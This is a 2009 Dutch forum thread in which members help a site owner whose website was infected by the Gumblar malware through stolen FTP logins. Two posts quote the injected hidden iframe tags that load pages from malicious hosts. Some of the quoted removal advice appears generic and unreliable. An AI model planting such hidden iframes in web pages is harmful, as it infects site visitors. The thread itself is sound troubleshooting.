abonnement Unibet Coolblue Bitvavo
pi_71749568
Sinds vandaag doet mijn website raar! Hij staat in mn sig maar hij heeft dus een virus!

Vanochtend wilde ik een foto van mn website linken, maar de betreffende simpleviewer-gallery deed het niet. Er stond dat ik Macromedia flash moest downloaden of doorklikken naar de gallery. Beide opties geprobeerd en het hielp allebei niet.

Daarna kreeg ik ineens meldingen van mijn virusscanner (avast) dat er een worm/virus op mijn site zit.
File name: http://fotoleonie.nl/\{gzip}
Mailware name: HTML:Iframe-inf
Malware type: Virus/worm.

Dus

Als ik mn website bezoek (met de virusscanner uit, ja niet zo slim misschien achteraf) ziet ie er helemaal raar uit, beginplaatje is weg, links openen in nieuwe tab enzo...

Ik kijk net in de bron van mn site en er staat een regel die ik niet ken:

1<iframe data-src="http://zdlz.in:8080/index.php" style="visibility:hidden;" width=118 height=147 style="visibility: hidden"></iframe>



Zou dit het probleem zijn? En zo ja, hoe komt dat op mijn site?

[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 12:36:38 ]
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  maandag 10 augustus 2009 @ 00:58:57 #2
178193 Juicyhil
Bekende FOK!ker
pi_71749714
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?

Hij klaagt namelijk wel over een iframe
Op dinsdag 9 augustus 2011 23:01 schreef SuperrrTuxxx het volgende:
Ik hou zoveel van jou, ik doe alles voor je! O+
pi_71749805
quote:
Op maandag 10 augustus 2009 @ 00:58 schreef Juicyhil het volgende:
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?

Hij klaagt namelijk wel over een iframe
Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks.
quote:
Op maandag 10 augustus 2009 @ 00:59 schreef mistermaniac het volgende:
Je bent niet de enige:

Vreemd virus op mijn website?
IP's blokkeren op ftp server

Joomla als CMS?
Argh
Ik lees het eerste topic en ik moet bijna janken
Gadverdamme

Nee, geen Joomla trouwens, een vriend heeft de website gemaakt in Dreamweaver en ik heb vorige week wat gewijzigd in Nvu.
Een vriendin met hetzelfde hostingbedrijf heeft hetzelfde probleem trouwens, dus het lijkt erop dat dit:
quote:
Op maandag 13 juli 2009 @ 20:42 schreef AquaMaryn het volgende:


Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
misschien het probleem kan zijn
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71750128
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71750264
lijkt op een of andere hacker.....
Vooral dat wat hier boven staat.
  maandag 10 augustus 2009 @ 12:48:36 #7
79166 Qwea
#teampindakaas #viesdik
pi_71757552
ha! Jij ook al. Zoals in de SC al zei ben je besmet met een virus. Of iig een computer is besmet waarop je inlogt naar je ftp. Dat virus jat je ftp gegevens en dmv een script worden die kut iframes erin gepropt MM had er ook last van.

Mac gescant, geen virus. Dus dan kan het enkel de pc op zn werk zijn. ww veranderd, en tot nu toe niet weer gehad. Maar het is mooi kut, want het jat ALLE ftp gegevens.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71758583
Ja, echt een kutvirus
Maar het lijkt nu weg te zijn
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71759819
Gumblar virus!

Veel last van hier (ISP) ff je FTP gegevens wijzigen..
  maandag 10 augustus 2009 @ 14:07:33 #10
79166 Qwea
#teampindakaas #viesdik
pi_71760085
quote:
Op maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!

Veel last van hier (ISP) ff je FTP gegevens wijzigen..
Dat gaat dus enkel werken als je ook het virus verwijderd anders dan blijft het terug komen.

-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71761181
Dat spreekt voor zich.. Computer cleanen, iframes verwijderen, FTP gegevens wijzigen..
pi_71778251
Het virus is terug

Nou, morgen alle stappen maar weer volgen
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 10:09:42 #13
79166 Qwea
#teampindakaas #viesdik
pi_71782838
Alles van je server pleuren, je backup helemaal nakijken. Dat virus verwijderen met avast (ik las zelfs dat meestal enkel formatten helpt ), je backup terug zetten, je ftp wachtwoord wijzigen.

Hier gelukkig geen virus aangetroffen, dus de ellende van het verwijderen/formatten hebben we niet gehad.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784195
Format? Neeeeeeeeeeeeeeeeeeeee!
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:28:45 #15
79166 Qwea
#teampindakaas #viesdik
pi_71784588
quote:
Op dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!
Ik las het op 3 websites. Te belachelijk ook
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
  dinsdag 11 augustus 2009 @ 11:30:07 #16
79166 Qwea
#teampindakaas #viesdik
pi_71784628
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:

1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)

2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.

3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.

4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.

ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784638
Argh

Ik zit nu dus weer te scannen, maar avast heeft voorlopig nog niks gevonden. Misschien een andere virusscanner proberen.

Ik weiger vooralsnog te formatteren
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71784701
quote:
Op dinsdag 11 augustus 2009 @ 11:30 schreef Qwea het volgende:
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:

1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)

2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.

3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.

4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.

ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
Oh, dit ga ik zo wel even doen dan.
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:35:56 #19
79166 Qwea
#teampindakaas #viesdik
pi_71784765
ik ben wel benieuwd als er wat gevonden wordt, wat het dan precies is.. MB.

En als avast niks vindt, probeer dan eens de online scan van mcafee ofzo
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
  dinsdag 11 augustus 2009 @ 11:38:16 #20
79166 Qwea
#teampindakaas #viesdik
pi_71784837
nog een stukje
quote:
Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.

On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).

When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
quote:
To remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.

To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."

Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71784948
Avast heeft vannacht gescand, maar hij is (weer ) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!

Ja, we hebben idd een netwerk Yay.
quote:
Op dinsdag 11 augustus 2009 @ 11:38 schreef Qwea het volgende:
nog een stukje
[..]

Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
Oh dit wordt een dagtaak
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 11:42:55 #22
79166 Qwea
#teampindakaas #viesdik
pi_71784974
quote:
Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer ) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!

Ja, we hebben idd een netwerk Yay.
[..]

Oh dit wordt een dagtaak
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785067
quote:
Op dinsdag 11 augustus 2009 @ 11:42 schreef Qwea het volgende:

[..]

Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
Ja, dat ga ik zo maar doen.

Naja, Re heeft 1 vd laptops mee naar zn werk Ik zal hem even bellen
Gebeld: hij is ook geinfecteerd

[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 11:58:59 ]
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
  dinsdag 11 augustus 2009 @ 12:01:11 #24
79166 Qwea
#teampindakaas #viesdik
pi_71785527
quote:
Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:

[..]

Ja, dat ga ik zo maar doen.

Naja, Re heeft 1 vd laptops mee naar zn werk Ik zal hem even bellen
Gebeld: hij is ook geinfecteerd
Heeft hij die laptop ook op het bedrijsnetwerk aangesloten? Dan mogen ze wel snel actie ondernemen
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785561
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
  dinsdag 11 augustus 2009 @ 12:03:47 #26
79166 Qwea
#teampindakaas #viesdik
pi_71785601
quote:
Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
ja hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.

Ik vraag me af, hoe dit concreet opgelost gaat worden.

Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...

Ga je dat ooit stoppen?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
pi_71785804
quote:
Op dinsdag 11 augustus 2009 @ 12:01 schreef Qwea het volgende:

[..]

Heeft hij die laptop ook op het bedrijsnetwerk aangesloten? Dan mogen ze wel snel actie ondernemen
Dat heb ik al gezegd ja.
quote:
Op dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe data-src="http://c6h.at:8080/ts/in.cgi?pepsi138" style="visibility:hidden;" width=125 height=125 style="visibility: hidden"></iframe>

Ze wisselen wel mooi af met linkjes
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
pi_71785829
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.

Stap 1:

Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis

Systeem Scan
  • Open HijackThis.
  • Klik op “Do a systemscan and save a logefile”
  • Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log”
  • Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply.
  • Na het kopieren van de log het programa afsluiten.

    Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
  • █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 12:11:47 #29
    79166 Qwea
    #teampindakaas #viesdik
    pi_71785847
    quote:
    Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:

    [..]

    Dat heb ik al gezegd ja.
    [..]

    Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
    Bij MM op het werk issie ook Vandaar dat MM hem op zijn site ook had. Complete chaos
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786030
    quote:
    Op dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
    Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.

    Stap 1:

    Download Trend Micro HijackThis
    http://www.trendsecure.co(...)ity_tools/hijackthis

    Systeem Scan
  • Open HijackThis.
  • Klik op “Do a systemscan and save a logefile”
  • Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log”
  • Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply.
  • Na het kopieren van de log het programa afsluiten.

    Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
  • Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:20:29 #31
    262 Re
    Kiss & Swallow
    pi_71786082
    quote:
    Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:

    [..]

    ja hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.

    Ik vraag me af, hoe dit concreet opgelost gaat worden.

    Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...

    Ga je dat ooit stoppen?
    call gelogd bij helpdesk, responsetijd 3 uur , dus ik merk het wel
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 12:23:09 #32
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786154
    quote:
    Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:

    [..]

    call gelogd bij helpdesk, responsetijd 3 uur , dus ik merk het wel
    3u? dat zijn ze schromelijk te laat ws

    Ik zou dan ook gelijk aangeven dat ze de website's na moeten lopen die gehost worden bij je werk. En alle andere comps in het netwerk
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:23:39 #33
    22273 Dizer
    Save the beard!
    pi_71786168
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    Friends don't let friends remain beardless...
      dinsdag 11 augustus 2009 @ 12:24:33 #34
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786182
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.

    Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786197
    quote:
    Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple


    Re had het toevallig wel van de week over: zullen we een nieuwe computer kopen? Dus wie weet
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71786243
    quote:
    Op dinsdag 11 augustus 2009 @ 12:24 schreef Qwea het volgende:

    [..]

    Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.

    Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
    Nee, dan blijf ik er vanaf!

    Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:30:54 #37
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786364
    quote:
    Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    quote:
    Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:

    [..]

    Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
    Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.

    Weer een reden om over te stappen op Apple
    Flash en adobe reader.
    quote:
    Wat doet Gumblar?
    Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.

    Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.

    Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
    quote:
    Affected Platforms:

    The malware affecting PCs targets prevalent Microsoft platforms:

    * Microsoft Windows 2000
    * Microsoft Windows XP
    * Microsoft Windows Server 2003
    Ik vraag me af waarom vista niet.

    overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten

    Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:31:43 #38
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786381
    quote:
    Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:

    [..]

    Nee, dan blijf ik er vanaf!

    Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
    Dat ding kan zich werkelijk overal hebben ingenesteld.

    Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786425
    Ok, ook niet meer googlen in IE dus

    Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71786454
    quote:
    Op dinsdag 11 augustus 2009 @ 12:31 schreef Qwea het volgende:

    [..]

    Dat ding kan zich werkelijk overal hebben ingenesteld.

    Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
    Nee, dat dan weer niet.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:34:42 #41
    105263 Litso
    Interlectueel.
    pi_71786479
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    "Dat is echt ontzettend zielig" ©
      dinsdag 11 augustus 2009 @ 12:34:46 #42
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786480
    quote:
    Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
    Ok, ook niet meer googlen in IE dus

    Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
    Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786505
    quote:
    Op dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Oh sorry
    Ik zal de link uit de OP halen!
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:35:47 #44
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786513
    quote:
    Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Download ff avast. Ik snap het niet he...

    Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786515
    quote:
    Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:

    [..]

    Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
    Ok.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:36:40 #46
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786529
    MB? Is het handig om de TT te wijzigen? Je weet nu immers wat het probleem precies is.

    Ik zeg maar wat hoor
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786547
    quote:
    Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
    MB? Is het handig om de TT te wijzigen? Je weet nu immers wat het probleem precies is.

    Ik zeg maar wat hoor
    Ja, goed idee!
    Zal ik het zelf doen?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:37:19 #48
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786549
    quote:
    Op dinsdag 11 augustus 2009 12:35 schreef MissBliss het volgende:

    [..]

    Ok.
    Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoog I did it
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 12:37:39 #49
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786555
    quote:
    Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:

    [..]

    Ja, goed idee!
    Zal ik het zelf doen?
    je bent toch niet voor jan snot mod
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786589
    Gedaan en gedaan
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:40:54 #51
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786638


    Loopt avast nog steeds vast nu je veilige modus hebt gedaan?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786670
    Ik heb (nog) geen veilige modus gedaan. Re heeft avast vanochtend aangezet en hij is nog niet klaar nu
    79% nu, daarna ga ik wel even die online scanner proberen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
